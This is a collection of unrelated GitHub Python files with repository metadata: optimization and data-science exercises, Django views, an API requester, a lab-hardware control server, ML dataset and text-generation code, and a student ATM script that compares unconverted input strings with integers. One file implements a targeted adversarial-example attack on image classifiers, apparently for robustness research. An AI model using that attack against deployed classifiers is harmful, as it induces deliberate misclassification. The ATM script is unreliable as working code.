print(\"==Chair %d: %s \" % (i + 1, g.displayName()))\r\n table[t].assignSeat(g.displayName())\r\n guest.remove(g)\r\n except:\r\n pass\r\n\r\ndef evaluation(table, next, keys):\r\n try:\r\n print(\"\\n\\n====EVALUATION====\")\r\n for t in range(0, len(table)):\r\n print(\"Table\",(t+1),\"(\"+str(table[t].generation)+\")\")\r\n for i in range(0, len(table[t].chairs)-1):\r\n for j in range(next, len(table[t].chairs)):\r\n print(\"-> \",table[t].chairs[i],\"-\",table[t].chairs[j],\" = \",GuestPair.getPoints(table[t].chairs[i],table[t].chairs[j]))\r\n keys+=str(GuestPair.getPoints(table[t].chairs[i], table[t].chairs[j]))\r\n next+=1\r\n next = 1\r\n calculateFitness(keys,0,0,[],0)\r\n keys = \"\"\r\n except:\r\n pass\r\n\r\ndef crossover(table,i):\r\n try:\r\n print(\"\\n\\n====CROSSOVER====\")\r\n while i < len(table):\r\n print(\"-> selected parents:\",table[i].chairs, table[i+1].chairs)\r\n offSpring1 = table[i].chairs[:int(len(table[i].chairs)/2)+1] + table[i+1].chairs[int(len(table[i].chairs)/2)+1:]\r\n offSpring2 = table[i].chairs[int(len(table[i].chairs) / 2)+1:] + table[i+1].chairs[:int(len(table[i].chairs)/2)+1]\r\n table[i].setOffSpring(offSpring1)\r\n table[i+1].setOffSpring(offSpring2)\r\n print(\"= produced offspring\",offSpring1,offSpring2)\r\n i+=2\r\n evaluation(table,1,\"\")\r\n except:\r\n pass\r\n\r\n\r\ndef calculateFitness(keys, i, s, temp, final):\r\n try:\r\n if (len(keys) % 2 == 1):\r\n keys += \"0\"\r\n while i < len(keys):\r\n temp.append(int(keys[i]) + int(keys[i + 1]))\r\n i += 2\r\n\r\n print(temp, keys)\r\n final += int(temp[0])\r\n for j in range(1, len(temp)):\r\n if (s == 0):\r\n final -= int(temp[j])\r\n s = 1\r\n else:\r\n final += int(temp[j])\r\n s = 0\r\n print(str(final))\r\n except Exception as e:\r\n print(e)\r\n\r\ndef shuffled(x):\r\n y = x[:]\r\n random.shuffle(y)\r\n return y\r\n\r\n","repo_name":"ThesisGeneticOptimizer/TGO","sub_path":"gen_al/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43526367423","text":"# 1. Simply read the data from the file\n# with open(\"weather_data.csv\", \"r\") as f:\n# data = f.readlines()\n# for i in range(0, len(data)):\n# data[i] = data[i][:-1]\n# print(data)\n\n# 2. Read the data using the CSV library and recover the temperatures\n# import csv\n# with open(\"weather_data.csv\", \"r\") as f:\n# data = csv.reader(f)\n# temperatures = []\n# next(data, None)\n# for row in data:\n# temperatures.append(int(row[1]))\n# print(temperatures)\n\n# 3. Same but using Pandas library\n# import pandas\n# data = pandas.read_csv(\"weather_data.csv\")\n# print(data[\"temp\"])\n\n# 4. Calculate the average of the temperatures\n# import pandas\n# data = pandas.read_csv(\"weather_data.csv\")\n# # temperatures = data[\"temp\"].to_list()\n# # print(round(sum(temperatures) / len(temperatures), 1))\n# print(data[\"temp\"].mean())\n\n# 5. Print the row where the temperature was at the maximum\n# import pandas\n# data = pandas.read_csv(\"weather_data.csv\")\n# print(data[data.temp == data.temp.max()])\n\n# 6. Get Monday's temperature in Fahrenheit\n# import pandas\n# data = pandas.read_csv(\"weather_data.csv\")\n# data = data[data.day == \"Monday\"]\n# temperature = data.temp * 1.8 + 32\n# print(str(temperature[0])+\"°F\")\n\n# 7. From the squirrel_data_full.csv, create a new DataFrame containing\n# the count of squirrel sorted by data fur type and make it a CSV.\nimport pandas\ndata = pandas.read_csv(\"squirrel_data_full.csv\")\nfurs = data[\"Primary Fur Color\"].to_list()\n\ncolour_list = []\nfor item in furs:\n if item not in colour_list:\n colour_list.append(item)\ncolour_list = colour_list[1:]\n\ncolour_count = [0] * len(colour_list)\nfor item in furs:\n for colour in colour_list:\n if colour == item:\n colour_count[colour_list.index(colour)] += 1\n\nprocessed_data = {\"Fur Color\": colour_list, \"Count\": colour_count}\nprocessed_data = pandas.DataFrame(processed_data)\nprocessed_data.to_csv(\"squirrel_data.csv\")\n","repo_name":"ypasquazzo/100DaysOfCode","sub_path":"Day 25/CSV/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20679651414","text":"import torch\nimport os\n\ndef save_checkpoints(save_dir, mode, model_name, ema, epoch, optimizer, best_MIou, epoch_mpa, classes_miou, epoch_fwiou, epoch_mp, epoch_pa):\n \n filename = os.path.join(save_dir + mode + '/', 'Epoch::{}:: | Model: {} MIoU: {:.3f} | MPA: {:3f}.pth'.format(epoch, model_name, best_MIou, epoch_mpa))\n \n torch.save({\n 'epoch': epoch + 1,\n 'state_dict': ema.model.state_dict(),\n 'shadow': ema.shadow, \n 'optimizer': optimizer.state_dict(),\n 'best_MIou': best_MIou,\n 'epoch_mpa': epoch_mpa,\n 'epoch_classes_miou': classes_miou,\n 'epoch_fwiou': epoch_fwiou,\n 'epoch_mp': epoch_mp,\n 'epoch_pa': epoch_pa,\n 'best_MIou': best_MIou\n }, filename)","repo_name":"jonychoi/ETRI_Segmentation","sub_path":"utils/save_checkpoints.py","file_name":"save_checkpoints.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"929932278","text":"import datetime\nfrom django.shortcuts import render\nfrom django.views import View\nfrom blog.models import BlogCategory , Blog\nfrom product.models import ProductCategory\nfrom django.contrib.auth.models import User\n\nfrom user_profile.models import UserProfile\n\n\n# Create your views here.\nclass Blogs(View):\n \n def get(self, request,blog_id=None):\n \n navigationProductCategory = ProductCategory.objects.filter(status=True)\n blogcategory = BlogCategory.objects.filter(status=True)\n blog = Blog.objects.all()\n recent_news = Blog.objects.filter(date=datetime.datetime.now()).exclude(id = blog_id)\n context ={\n 'navigationProductCategory':navigationProductCategory,\n 'blogcategory':blogcategory,\n 'blogs':blog,\n 'recent_news':recent_news,\n }\n return render(request,\"blog.html\",context)\n\n\nclass blogdetails(View):\n def get(self, request,blog_id):\n \n print(blog_id)\n \n \n navigationProductCategory = ProductCategory.objects.filter(status=True)\n blogcategory = BlogCategory.objects.filter(status=True)\n blog = Blog.objects.filter(id = blog_id)\n admininfo = User.objects.filter(id=1)\n userprofile = UserProfile.objects.filter(id=3)\n recent_news = Blog.objects.filter(date=datetime.datetime.now()).exclude(id = blog_id)\n \n context ={\n 'navigationProductCategory':navigationProductCategory,\n 'blogcategory':blogcategory,\n 'blogs':blog,\n 'admininfo':admininfo,\n 'userprofile':userprofile,\n 'recent_news':recent_news,\n # 'recent_news':list(recent_news.values()),\n # 'userprofiles':list(userprofile.values()),\n # 'admininfo':list(admininfo.values()),\n }\n return render(request,\"blogdetails.html\",context)\n","repo_name":"mohitkhokale/Ecom_site","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27786690527","text":"import logging\nimport os\n\nimport requests\nfrom app.errors.utils import get_error_message\nfrom fastapi import HTTPException\n\nlogger = logging.getLogger(__name__)\n\n\nclass Requester:\n AUTH_SERVER_API_KEY = os.environ[\"AUTH_SERVER_API_KEY\"]\n POST_SERVER_API_KEY = os.environ[\"POST_SERVER_API_KEY\"]\n USER_SERVER_API_KEY = os.environ[\"USER_SERVER_API_KEY\"]\n PAYMENT_API_KEY = os.environ[\"PAYMENT_API_KEY\"]\n\n POST_API_URL = os.environ[\"POSTSERVER_URL\"]\n AUTH_API_URL = os.environ[\"AUTHSERVER_URL\"]\n USER_API_URL = os.environ[\"USERSERVER_URL\"]\n PAYMENT_API_URL = os.environ[\"PAYMENT_URL\"]\n\n @classmethod\n def room_srv_fetch(\n cls, method, path, expected_statuses, payload=None, extra_headers=None\n ):\n header = {\"api-key\": cls.POST_SERVER_API_KEY}\n\n if extra_headers is not None:\n header.update(extra_headers)\n\n if payload is None:\n payload = {}\n\n url = cls.POST_API_URL + path\n\n return cls._fetch(method, url, header, payload, expected_statuses)\n\n @classmethod\n def auth_srv_fetch(\n cls, method, path, expected_statuses, payload=None, extra_headers=None\n ):\n header = {\"api-key\": cls.AUTH_SERVER_API_KEY}\n print(f\"La api key del post server es: {header}\")\n\n if extra_headers is not None:\n header.update(extra_headers)\n\n if payload is None:\n payload = {}\n\n url = cls.AUTH_API_URL + path\n\n return cls._fetch(method, url, header, payload, expected_statuses)\n\n @classmethod\n def user_srv_fetch(\n cls, method, path, expected_statuses, payload=None, extra_headers=None\n ):\n header = {\"api-key\": cls.USER_SERVER_API_KEY}\n\n if extra_headers is not None:\n header.update(extra_headers)\n\n if payload is None:\n payload = {}\n\n url = cls.USER_API_URL + path\n print(\n f\"La url de user es: {url}, la env var resulto: \\\n {os.environ['USERSERVER_URL']}\"\n )\n\n return cls._fetch(method, url, header, payload, expected_statuses)\n\n @classmethod\n def payment_fetch(\n cls, method, path, expected_statuses, payload=None, extra_headers=None\n ):\n header = {\"api-key\": cls.PAYMENT_API_KEY}\n\n if extra_headers is not None:\n header.update(extra_headers)\n\n if payload is None:\n payload = {}\n\n url = cls.PAYMENT_API_URL + path\n\n return cls._fetch(method, url, header, payload, expected_statuses)\n\n @classmethod\n def _fetch(cls, method, url, headers, payload, expected_statuses):\n logger.info(\"Sending method %s to url: %s\", method, url)\n logger.debug(\"Header: %s, payload %s\", headers, payload)\n\n response = requests.request(method, url, json=payload, headers=headers)\n response_code = response.status_code\n if response_code not in expected_statuses:\n raise HTTPException(\n status_code=response_code, detail=get_error_message(response)\n )\n\n return response.json(), response.status_code\n","repo_name":"bookbnb-G7/bookbnb-appserver","sub_path":"appserver/app/services/requester.py","file_name":"requester.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41192781664","text":"import torch\nimport torch.nn as nn\nfrom tqdm import tqdm\n\n\nclass AttackWrapper:\n def __init__(self, model, attack_lr=1e-3, attack_iter=500,\n benign_ratio=0.8, benign_weight=0.2, clip_grad=10):\n self.model = model\n self.model.eval()\n self.attack_lr = attack_lr\n self.attack_iter = attack_iter\n self.benign_ratio = benign_ratio\n self.benign_weight = benign_weight\n self.clip_grad = clip_grad\n self.cls_criterion = nn.CrossEntropyLoss()\n\n def __call__(self, x, y, target_y):\n with tqdm(range(self.attack_iter)) as loader:\n for i in loader:\n x.requires_grad_(True)\n pred = self.model(x)\n attack_loss = self.cls_criterion(pred, target_y)\n benign_loss = self.cls_criterion(pred, y)\n attack_loss.backward(retain_graph=True)\n attack_grad = x.grad.clone()\n x.grad.data.zero_()\n benign_loss.backward(retain_graph=True)\n benign_grad = x.grad.clone() * self.benign_weight\n x.grad.data.zero_()\n prob = nn.functional.softmax(pred, dim=1)\n gt_prob = prob[[i for i in range(x.size(0))], y]\n gt_prob.mean().backward()\n saliency = x.grad.clone().abs()\n x.grad.data.zero_()\n benign_mask = []\n for j, s in enumerate(saliency):\n s = s.contiguous().view(-1).sort(descending=True)[0]\n threshold = s[int(self.benign_ratio * s.size(0))]\n benign_mask.append(saliency[j] >= threshold)\n benign_mask = torch.cat([m.float().unsqueeze(0) for m in benign_mask], dim=0)\n x = x.clone().detach()\n attack_grad = torch.clamp(attack_grad, -self.clip_grad, self.clip_grad)\n benign_grad = torch.clamp(benign_grad, -self.clip_grad, self.clip_grad)\n x -= self.attack_lr * (attack_grad * (1 - benign_mask) + benign_grad * benign_mask)\n pred = self.model(x).argmax(dim=1)\n print(pred, target_y)\n return x, (pred == target_y).int().detach()\n\n def to(self, device):\n self.model.to(device)\n\n","repo_name":"zcc31415926/P-ALPhA","sub_path":"attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29304176139","text":"def cajero():\n saldo_cuenta = 100000\n saldo_cajero = 1000000\n intentos = 0\n\n while True:\n usuario = input(\"Ingrese su usuario: \")\n clave = input(\"Ingrese su clave: \")\n\n if usuario == \"10334151\" and clave == \"1803\":\n intentos = 0\n print(\"Acceso permitido\\n\")\n\n while True:\n monto_retiro = (input(\"Ingrese el monto a retirar: \"))\n\n if monto_retiro > saldo_cuenta:\n print(\"Monto no permitido. El saldo de su cuenta es insuficiente.\\n\")\n elif monto_retiro > saldo_cajero:\n print(\"Monto no permitido. El cajero no cuenta con suficiente dinero.\\n\")\n else:\n saldo_cuenta -= monto_retiro\n saldo_cajero -= monto_retiro\n print(\"Retiro exitoso.\")\n print(\"Saldo cuenta:\", saldo_cuenta)\n print(\"Saldo cajero:\", saldo_cajero, \"\\n\")\n else:\n intentos += 1\n print(\"Clave inválida. Intento:\", intentos, \"\\n\")\n\n if intentos == 3:\n print(\"Tarjeta bloqueada. Ha excedido el número máximo de intentos.\")\n break\n\n opcion = input(\"¿Desea realizar otra transacción? (N para salir): \")\n if opcion.upper() == \"N\":\n break\n\ncajero()\n\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej10/hito1_ej10_dabda03af113312de1c61fc9a2428a1d.py","file_name":"hito1_ej10_dabda03af113312de1c61fc9a2428a1d.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3547251239","text":"from lichee.dataset.io_reader.io_reader_base import BaseIOReader, TFRecordReader\nfrom lichee.utils import common\nfrom lichee.utils.tfrecord.reader import read_single_record_with_spec_index\nfrom lichee.utils.tfrecord import tfrecord_loader\nfrom lichee.utils.tfrecord.tools import create_index\nimport concurrent.futures\nfrom abc import ABCMeta\nfrom concurrent.futures import as_completed\nfrom typing import List\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom sklearn.preprocessing import MultiLabelBinarizer, LabelEncoder\nfrom transformers import AutoTokenizer\nimport warnings\nfrom sklearn.metrics import f1_score\nfrom lichee.utils.tfrecord import example_pb2\nfrom lichee.utils.tfrecord.reader import tfrecord_iterator\nimport pandas as pd\nwarnings.filterwarnings(\"ignore\")\n\n\nclass BaseDataset(Dataset):\n def __init__(self, df_path, data_path,text_type='title'):\n self.df_path = df_path\n\n self.text_type = text_type\n self.data_path = data_path\n\n def __len__(self):\n return len(self.df_path)\n\n def __getitem__(self,index):\n datas = self.df_path.iloc[index, 0].split('\\t')\n vid_1 = datas[0]\n vid_2 = datas[1]\n label = float(datas[2])\n \n v_content_1 = self.read_record(vid_1)\n v_content_2 = self.read_record(vid_2)\n return (vid_1, v_content_1), (vid_2, v_content_2), label\n\n def read_record(self, target):\n frame_path = self.data_path + 'frame_feature/' + target + '.npy'\n title_path = self.data_path + 'title/' + target + '.txt'\n asr_text_path = self.data_path + 'asr_text/' + target + '.txt'\n frame_feature = self.frame_process(frame_path)\n if self.text_type == 'asr_text':\n text = self.text_tokenizer(asr_text_path)\n elif self.text_type == 'title':\n text = self.text_tokenizer(title_path)\n elif self.text_type == 'com_text':\n text = self.text_tokenizer(title_path, asr_text_path, max_length=64)\n return frame_feature, text\n \n def frame_process(self, frames_path, num_segments=32):\n frame_feature = np.load(frames_path)\n zero_frame = frame_feature[0] * 0.\n num_frames = frame_feature.shape[0]\n dim = frame_feature.shape[1]\n\n if num_frames <= num_segments:\n padding_length = num_segments - num_frames\n fillarray = np.zeros((padding_length, dim))\n res = np.concatenate((frame_feature, fillarray), axis=0)\n mask = [1] * (num_frames+1) + ([0] * padding_length)\n else:\n res = frame_feature[:, :num_segments]\n mask = [1] * (num_segments+1)\n return torch.tensor(np.c_[res], dtype=torch.float32), torch.tensor(mask)\n\n def text_tokenizer(self,text_1_path, text_2_path=None,max_length=50):\n text_2 = None\n with open(text_1_path, \"r\") as f: \n text_1 = f.read()\n if text_2_path is not None:\n with open(text_2_path, \"r\") as f: \n text_2 = f.read()\n return self.text_tokenizer_2(text_1, text_2, max_length)\n\n def text_tokenizer_2(self,text,text_2=None, max_length=50):\n Tokenizer = AutoTokenizer.from_pretrained('data/bert_base')\n PAD, CLS, SEP = '[PAD]', '[CLS]', '[SEP]'\n token = Tokenizer.tokenize(text)\n token_1 = [CLS] + token + [SEP]\n seq_len = len(token)\n mask = []\n token_2 = []\n token = token_1\n if text_2 is not None:\n token_2 = Tokenizer.tokenize(text_2)\n token = token_1 + token_2\n token_ids = Tokenizer.convert_tokens_to_ids(token)\n if len(token) < max_length:\n mask = [1] * len(token_ids) + [0] * (max_length - len(token))\n token_ids += ([0] * (max_length - len(token)))\n token_type_ids = [0]*len(token_1) + [1]*len(token_2) + [0]*(max_length - len(token))\n else:\n mask = [1] * max_length\n token_ids = token_ids[:max_length]\n token_type_ids = [0]*len(token_1) + [1]*len(token_2)\n token_type_ids = token_type_ids[:max_length]\n return torch.LongTensor(token_ids), torch.LongTensor(token_type_ids), torch.LongTensor(mask)\n\n\n","repo_name":"chenjiashuo123/AIAC-2021-Task1-Rank17","sub_path":"util/dataset_pair_cls_mask.py","file_name":"dataset_pair_cls_mask.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"43217657638","text":"import os\nfrom labrad.server import LabradServer, setting, Signal\nfrom labrad import types as T\nfrom twisted.internet.defer import returnValue, inlineCallbacks\nfrom labrad.support import getNodeName\nfrom artiq_api import ARTIQ_api\n\n\nTTLSIGNAL_ID = 828176\nDACSIGNAL_ID = 828175\nDDSSIGNAL_ID = 828172\n\nDDB_FILEPATH = 'C:\\\\Users\\\\barium133\\\\Code\\\\barium\\\\lib\\\\servers\\\\Artiq\\\\device_db.py'\n\nclass Artiq_Server(LabradServer):\n\n name = 'Artiq Server'\n\n ddsChanged = Signal(DDSSIGNAL_ID, 'signal: dds changed', '(ssv)')\n ttlChanged = Signal(TTLSIGNAL_ID, 'signal: ttl changed', '(sb)')\n dacChanged = Signal(DACSIGNAL_ID, 'signal: dac changed', '(ssv)')\n\n @inlineCallbacks\n def initServer(self):\n self.api = ARTIQ_api(DDB_FILEPATH)\n\n #initialize DAC required if device restarted\n yield self.api.initializeDAC()\n yield self.set_Devices()\n #self.setup()\n\n def set_Devices(self):\n \"\"\"\n Get the list of devices in the ARTIQ box.\n \"\"\"\n dds_tmp = list(self.api.dds_list.values())[0]\n self.ca = dds_tmp.amplitude_to_asf(1.0)\n self.fa = dds_tmp.frequency_to_ftw(1.0)*1e6\n self.dac_vals = [0]*32\n self.dac_state = [False]*32\n self.TTL_state = [False]*24\n self.dds_params = {}\n self.ttlout_list = list(self.api.ttlout_list.keys())\n self.ttlin_list = list(self.api.ttlin_list.keys())\n self.dds_list = list(self.api.dds_list.keys())\n for key in self.dds_list:\n self.dds_params[key] = [100.0,0.0,False,31.5]\n\n @inlineCallbacks\n def setup(self):\n for i in range(4,24):\n yield self.api.setTTL('ttl'+str(i),False)\n for i in range(32):\n yield self.api.setZotino(i, float(0.0))\n \n # CORE\n @setting(21, returns='*s')\n def get_Devices(self, c):\n \"\"\"\n Returns a list of ARTIQ devices.\n \"\"\"\n return list(self.api.device_db.keys())\n\n @setting(31, dataset_name='s', returns='?')\n def get_Dataset(self, c, dataset_name):\n \"\"\"\n Returns a dataset.\n Arguments:\n dataset_name (str) : the name of the dataset\n Returns:\n the dataset\n \"\"\"\n return self.datasets.get(dataset_name, archive=False)\n\n\n @setting(421, dac_num='i', value='v', units='s', returns='')\n def set_dac(self, c, dac_num, value, units='mu'):\n \"\"\"\n Manually set the voltage of a DAC channel.\n Arguments:\n dac_num (int) : the DAC channel number\n value (float) : the value to write to the DAC register\n units (str) : the voltage units, either 'mu' or 'v'\n \"\"\"\n voltage_max = 10.0\n # check that dac channel is valid\n if (dac_num > 31) or (dac_num < 0):\n raise Exception('Error: device does not exist.')\n # check that units and voltage are valid\n if value > voltage_max or value < -voltage_max:\n raise Exception('Error: voltage out of range')\n\n\n self.dac_vals[dac_num] = float(value)\n if self.dac_state[dac_num]:\n yield self.api.setZotino(dac_num, float(value))\n\n\n @setting(431, dac_num='i', returns='i')\n def read_dac(self, c, dac_num):\n \"\"\"\n Read the value of a DAC register.\n Arguments:\n dac_num (int) : the dac channel number\n param (float) : the register to read from\n \"\"\"\n if (dac_num > 31) or (dac_num < 0):\n raise Exception('Error: device does not exist.')\n\n reg_val = yield self.api.readZotino(dac_num)\n\n returnValue(reg_val)\n\n @setting(441, dac_num = 'i', returns = 'v')\n def get_dac_val(self, c, dac_num):\n return(self.dac_vals[dac_num])\n\n @setting(451, dac_num = 'i', returns = '')\n def set_dac_state(self, c, dac_num, state):\n if state:\n self.dac_state[dac_num] = True\n yield self.api.setZotino(dac_num, self.dac_vals[dac_num])\n else:\n self.dac_state[dac_num] = False\n yield self.api.setZotino(dac_num, float(0.0))\n\n @setting(461, dac_num = 'i', returns = 'b')\n def get_dac_state(self, c, dac_num):\n return(self.dac_state[dac_num])\n\n # TTL\n @setting(211, returns='*s')\n def list_ttl(self, c):\n \"\"\"\n Lists all available TTL channels.\n Returns:\n (*str) : a list of all TTL channels.\n \"\"\"\n return self.ttlout_list + self.ttlin_list\n\n @setting(221, ttl_name='i', state=['b', 'i'], returns='')\n def set_ttl(self, c, ttl_name, state):\n \"\"\"\n Manually set a TTL to the given state. TTL can be of classes TTLOut or TTLInOut.\n Arguments:\n ttl_name (str) : name of the ttl\n state [bool, int] : ttl power state\n \"\"\"\n if 'ttl'+ str(ttl_name) not in self.ttlout_list:\n raise Exception('Error: devi6ce does not exist.')\n if (type(state) == int) and (state not in (0, 1)):\n raise Exception('Error: invalid state.')\n self.TTL_state[ttl_name] = state\n yield self.api.setTTL('ttl'+ str(ttl_name), state)\n self.ttlChanged(('ttl'+ str(ttl_name), state))\n\n\n @setting(222, ttl_name='i', returns='b')\n def get_ttl(self, c, ttl_name):\n \"\"\"\n Read the power state of a TTL. TTL must be of class TTLInOut.\n Arguments:\n ttl_name (str) : name of the ttl\n Returns:\n (bool) : ttl power state\n \"\"\"\n if 'ttl'+ str(ttl_name) not in self.ttlin_list:\n raise Exception('Error: device does not exist.')\n state = yield self.api.getTTL('ttl'+ str(ttl_name))\n returnValue(bool(state))\n\n @setting(223, TTL_num = 'i', returns = 'b')\n def get_ttl_state(self, c, TTL_num):\n return(self.TTL_state[TTL_num])\n\n\n # DDS\n @setting(311, returns='*s')\n def list_dds(self, c):\n \"\"\"\n Get the list of available DDS (AD5372) channels.\n Returns:\n (*str) : the list of dds names\n \"\"\"\n dds_list = yield self.api.dds_list.keys()\n #dds_list = yield self.api.urukul_list.keys()\n returnValue(list(dds_list))\n\n @setting(301, returns='*s')\n def list_urukul(self, c):\n \"\"\"\n Get the list of available DDS (AD5372) channels.\n Returns:\n (*str) : the list of dds names\n \"\"\"\n ur_list = yield self.api.urukul_list.keys()\n #dds_list = yield self.api.urukul_list.keys()\n returnValue(list(ur_list))\n\n @setting(321, dds_name='s', returns='')\n def initialize_dds(self, c, dds_name):\n \"\"\"\n Resets/initializes the DDSs.\n Arguments:\n dds_name (str) : the name of the dds\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n yield self.api.initializeDDS(dds_name)\n\n \n @setting(323, dds_name='s', freq='v', returns='')\n def set_dds_freq(self, c, dds_name, freq):\n \"\"\"\n Manually set the frequency of a DDS.\n Arguments:\n dds_name (str) : the name of the dds\n freq (float) : the frequency in Hz\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n if freq > 500 or freq < 0:\n raise Exception('Error: frequency must be within [0 Hz, 400 MHz].')\n amp = self.dds_params[dds_name][1]\n self.dds_params[dds_name][0] = float(freq)\n yield self.api.setDDS(dds_name, float(freq), float(amp))\n self.ddsChanged((dds_name, 'freq', float(freq)))\n\n @setting(324, dds_name='s', amp='v', returns='')\n def set_dds_amp(self, c, dds_name, amp):\n \"\"\"\n Manually set the amplitude of a DDS.\n Arguments:\n dds_name (str) : the name of the dds\n ampl (float) : the fractional amplitude\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n if amp > 1 or amp < 0:\n raise Exception('Error: amplitude must be within [0, 1].')\n freq = self.dds_params[dds_name][0]\n self.dds_params[dds_name][1] = float(amp)\n yield self.api.setDDS(dds_name, float(freq), float(amp))\n self.ddsChanged((dds_name, 'amp', float(amp)))\n\n @setting(334, dds_name='s', att='v', returns='')\n def set_dds_att(self, c, dds_name, att):\n \"\"\"\n Manually set the amplitude of a DDS.\n Arguments:\n dds_name (str) : the name of the dds\n ampl (float) : the fractional amplitude\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n if att > 31.5 or att < 0:\n raise Exception('Error: attenuation must be within [0, 31.5].')\n self.dds_params[dds_name][3] = float(att)\n yield self.api.setDDSatt(dds_name, float(att))\n self.ddsChanged((dds_name, 'att', float(att)))\n \n\n @setting(322, dds_name='s', state=['b', 'i'], returns='')\n def toggle_dds(self, c, dds_name, state):\n \"\"\"\n Manually toggle a DDS via the RF switch\n Arguments:\n dds_name (str) : the name of the dds\n state [bool, int] : power state\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n if (type(state) == int) and (state not in (0, 1)):\n raise Exception('Error: device does not exist.')\n self.dds_params[dds_name][2] = state\n yield self.api.toggleDDS(dds_name, state)\n \n @setting(331, dds_name='s', returns='s')\n def readDDS(self, c, dds_name):\n \"\"\"\n Read the value of a DDS register.\n Arguments:\n dds_name (str) : the name of the dds\n addr (int) : the address to read from\n length (int) : how many bits to read\n Returns:\n (word) : the register value\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n\n reg_val = yield self.api.getDDS(dds_name)\n returnValue(str(reg_val[0]/float(self.fa)) + ' ' + str(float(reg_val[1])/float(self.ca)) + ' ' + str(reg_val[2]))\n\n\n @setting(351, dds_name = 's', returns = 'v')\n def get_dds_freq(self, c, dds_name):\n return(self.dds_params[dds_name][0])\n \n @setting(361, dds_name = 's', returns = 'v')\n def get_dds_amp(self, c, dds_name):\n return(self.dds_params[dds_name][1])\n\n @setting(371, dds_name = 's', returns = 'b')\n def get_dds_state(self, c, dds_name):\n return(self.dds_params[dds_name][2])\n\n @setting(381, dds_name = 's', returns = 'v')\n def get_dds_att(self, c, dds_name):\n return(self.dds_params[dds_name][3])\n\n @setting(391, dds_name = 's', returns = 'v')\n def read_dds_att(self, c, dds_name):\n return self.api.getDDSatt(dds_name)\n \nif __name__ == \"__main__\":\n from labrad import util\n util.runServer(Artiq_Server())\n","repo_name":"zjwall/Barium2","sub_path":"barium/lib/servers/Artiq/artiq_server.py","file_name":"artiq_server.py","file_ext":"py","file_size_in_byte":11182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29275597530","text":"import tensorflow as tf\nfrom tensorflow import data\nfrom tensorflow import TensorShape\nfrom keras import Sequential\nfrom keras.layers import Embedding, GRU, Dense\n\nimport numpy as np\n\ntext = open('example.txt', 'rb').read().decode(encoding='utf-8')\n\nvocab = sorted(set(text))\n# print(len(vocab))\n\nchar2idx = {unique: idx for idx, unique in enumerate(vocab)}\nidx2char = np.array(vocab)\n\ntext_as_int = np.array([char2idx[char] for char in text])\n\nseq_length = 100\n\nchar_dataset = data.Dataset.from_tensor_slices(text_as_int)\n\nsequences = char_dataset.batch(seq_length + 1, drop_remainder=True)\n\ndef split_input_target(chunk):\n input_text = chunk[:-1]\n target_text = chunk[1:]\n return input_text, target_text\n\ndataset = sequences.map(split_input_target)\n\nbatch_size = 64\nbuffer_size = 35162\n\nds = dataset.shuffle(buffer_size).batch(batch_size, drop_remainder=True)\n\nvocab_size = len(vocab)\nembedding_dim = 256\nrnn_units = 1024\n\ndef build_model(vocab_size, embedding_dim, rnn_units, batch_size):\n return Sequential(\n [\n Embedding(\n vocab_size,\n embedding_dim,\n batch_input_shape=[batch_size, None],\n ),\n GRU(\n rnn_units,\n return_sequences=True,\n stateful=True,\n recurrent_initializer='glorot_uniform',\n ),\n Dense(vocab_size),\n ]\n )\n\ncheckpoint_dir = 'training_checkpoints'\n\nmodel = build_model(vocab_size, embedding_dim, rnn_units, batch_size=1)\n\nmodel.load_weights(tf.train.latest_checkpoint(checkpoint_dir)).expect_partial()\n\nmodel.build(TensorShape([1, None]))\n\n# Some info of model\n# model.summary()\ntext_generated = []\n\ndef generation_text(model, start_string):\n num_generations = 300\n input_eval = [char2idx[s] for s in start_string]\n input_eval = tf.expand_dims(input_eval, 0)\n\n temperature = 0.5\n max_length = 142\n power = 1\n model.reset_states()\n for _ in range(num_generations):\n predictions = model(input_eval)\n predictions = tf.squeeze(predictions, 0)\n\n predictions = predictions / temperature\n predicted_id = tf.random.categorical(predictions, num_samples=1)[-1, 0].numpy()\n\n input_eval = tf.expand_dims([predicted_id], 0)\n text_generated.append(idx2char[predicted_id])\n\n if \" \" in text_generated and (max_length*power-10) < len(text_generated) < (max_length*power+10):\n text_generated.append(\"\\n\")\n power += 1\n\n return (start_string + ''.join(text_generated) + \".\")\n\nstart_string = input(\"Start string: \")\n# #Generating text\nprint(generation_text(model, start_string=start_string))\n","repo_name":"W00JTAS/AI-generator_testu","sub_path":"text_generator.py","file_name":"text_generator.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43496086090","text":"\r\nreadMe 